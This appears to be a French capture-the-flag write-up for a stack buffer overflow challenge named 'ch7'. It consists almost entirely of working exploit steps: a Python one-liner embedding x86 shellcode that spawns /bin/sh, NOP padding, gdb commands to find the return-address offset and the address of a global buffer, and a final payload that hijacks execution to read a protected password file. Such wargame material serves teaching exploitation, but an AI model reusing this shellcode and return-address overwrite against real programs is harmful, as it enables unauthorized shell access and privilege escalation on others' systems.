## On passe un shellcode en argument et on overflow avec des \x90

cd /tmp/
mkdir lol
cd lol
touch file
cd

python -c 'print( "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" + "\x90"*450 +  "ABCDEFGHIJKLMNOPQRSTUVWXYZ")' > /tmp/lol/file
gdb ch7
break *0x80484a5
run $(cat /tmp/lol/file)
exemple:
EAX: 0x504F4E4D
convert: PONM
--> python -c 'print( "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" + "\x90"*450 +  "ABCDEFGHIJKL")' > /tmp/lol/file

## On obtient l'adresse de username ou est stocke le shellcode pout l'appeler a la suite de notre overflow, lorsque le main quitte

disas main
0x0804847f <+61>:	movl   $0x804a040,(%esp)
adresse de la variable username: 0x804a040
--> python -c 'print( "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" + "\x90"*450 +  "ABCDEFGHIJKL" + "\x40\xa0\x04\x08")' > /tmp/lol/file
q

./ch7 $(cat /tmp/lol/file)
cat .passwd
